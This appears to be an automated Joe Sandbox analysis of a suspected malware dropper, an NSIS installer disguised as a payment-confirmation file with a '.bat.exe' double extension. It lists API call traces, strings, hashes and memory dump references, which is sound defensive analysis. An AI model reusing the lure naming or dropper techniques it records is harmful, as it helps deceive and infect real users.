lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

wsprintfW.USER32 ref: 00403AC4
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
DeleteFileW.KERNEL32(0042C800), ref: 00403B03
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31

Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C

CopyFileW.KERNEL32(C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
ExitProcess.KERNEL32 ref: 00403BB2
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
ExitProcess.KERNEL32 ref: 00403C5C

Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36

Strings

TEMP, xrefs: 0040396D
~nsu%X.tmp, xrefs: 00403ABB
\Temp, xrefs: 0040393F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040365C
Low, xrefs: 0040395B
C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, xrefs: 00403B42
SeShutdownPrivilege, xrefs: 00403BEB
1033, xrefs: 00403989
TMP, xrefs: 00403975
C:\Users\user\Desktop, xrefs: 00403A85
NSIS Error, xrefs: 004037A8
Error launching installer, xrefs: 00403A10
C:\Users\user\AppData\Local\Temp\, xrefs: 0040391D, 00403922, 00403938, 00403944, 00403953, 00403960, 0040396C, 00403974, 00403A62, 00403AE3, 00403B0F, 00403B30, 00403B39
UXTHEME, xrefs: 00403733, 00403738, 0040373E
"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 004037BD, 004037C3, 004037D8, 004039B6
user32::EnumWindows(i r1 ,i 0), xrefs: 00403A72
C:\Users\user\eftermodnendes\ringeagt, xrefs: 0040390D, 00403A2F, 00403A7C, 00403A8A
C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00403A3A

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
API String ID: 1813718867-3475534917
Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405DB7
lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405DFF
lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405E22
lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405E28
FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 00405E38
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
FindClose.KERNEL32(00000000), ref: 00405EE7

Strings

\*.*, xrefs: 00405DF9
"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 00405D97
POB, xrefs: 00405DE7

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$POB$\*.*
API String ID: 2035342205-1437108013
Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45

Function 004069DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
FindClose.KERNEL32(00000000), ref: 004069F6

Strings

C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 004069DF

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
API String ID: 2295610775-1847755183
Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00008001), ref: 00403DD5
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420), ref: 00403E55
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
GetFileAttributesW.KERNEL32(Call), ref: 00403E73
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

RegisterClassW.USER32(00428A00), ref: 00403EF9
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
ShowWindow.USER32(00000005,00000000), ref: 00403F7C
GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
RegisterClassW.USER32(00428A00), ref: 00403FBE
DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD

Strings

Call, xrefs: 00403E1C, 00403E25, 00403E33, 00403E82, 00403E88
H/B, xrefs: 00403D80
Control Panel\Desktop\ResourceLocale, xrefs: 00403D88
.exe, xrefs: 00403E62
RichEdit, xrefs: 00403FAF
.DEFAULT\Control Panel\International, xrefs: 00403DC0
RichEd32, xrefs: 00403F90
1033, xrefs: 00403D74, 00403DD0
RichEdit20W, xrefs: 00403FA0, 00403FA6
RichEd20, xrefs: 00403F82
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D59
"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 00403D57
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00403DE4, 00403DEC, 00403E8F, 00403E95, 00403EA5
_Nb, xrefs: 00403ED8, 00403F40

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2689128310
Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

Function 004030D5 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030E9
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,00000400), ref: 00403105

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198

GetFileSize.KERNEL32(00000000,00000000,inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 0040314E
GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290

Strings

Null, xrefs: 004031CC
C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
soft, xrefs: 004031C3
Error launching installer, xrefs: 00403125
Inst, xrefs: 004031BA
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, xrefs: 00403142
"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 004030DE
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe$soft
API String ID: 2803837635-1681625531
Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

Function 004066BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3

Strings

Call, xrefs: 004066EC, 004067A6, 004067AD, 004067B1, 004067CA, 004067CB, 004067E0, 004067F6, 00406827, 00406853, 00406888, 0040688E, 004068AB, 004068BE, 004068DC, 004068E2, 004068EB, 00406920
Software\Microsoft\Windows\CurrentVersion, xrefs: 004067B2
user32::EnumWindows(i r1 ,i 0), xrefs: 004068B8
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406883

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
API String ID: 4024019347-3319343437
Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017DA

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Strings

Call, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll, xrefs: 0040183A, 00401856
C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 00401826, 00401844

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
